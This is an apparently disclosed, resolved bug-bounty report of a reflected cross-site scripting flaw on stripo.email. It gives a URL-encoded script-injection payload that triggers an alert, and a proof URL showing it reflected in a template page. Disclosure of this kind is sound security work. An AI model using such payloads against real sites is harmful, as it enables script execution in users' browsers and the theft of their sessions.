stripo.email reflected xss
Medium
S
Stripo Inc
Submitted None
Actions:
Reported by
trazer
Vulnerability Details
Technical details and impact analysis
hello securitty team tested windows 10 and firefox 69.0.3 (64 bit)
test url: <https://stripo.email//templates/merry-christmas-email-template-winter-inspiration-gifts-flowers-industry >
payload: %3E%22%27%3E%3Cscript%3Ealert%281578%29%3C%2Fscript%3E
Proof Url :
```
https://stripo.email//templates/merry-christmas-email-template-winter-inspiration-gifts-flowers-industry%3E%22%27%3E%3Cscript%3Ealert%281578%29%3C%2Fscript%3E
```
Proof Url open firefox
{F608355}
## Impact
https://www.owasp.org/index.php?title=Reflected_XSS
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected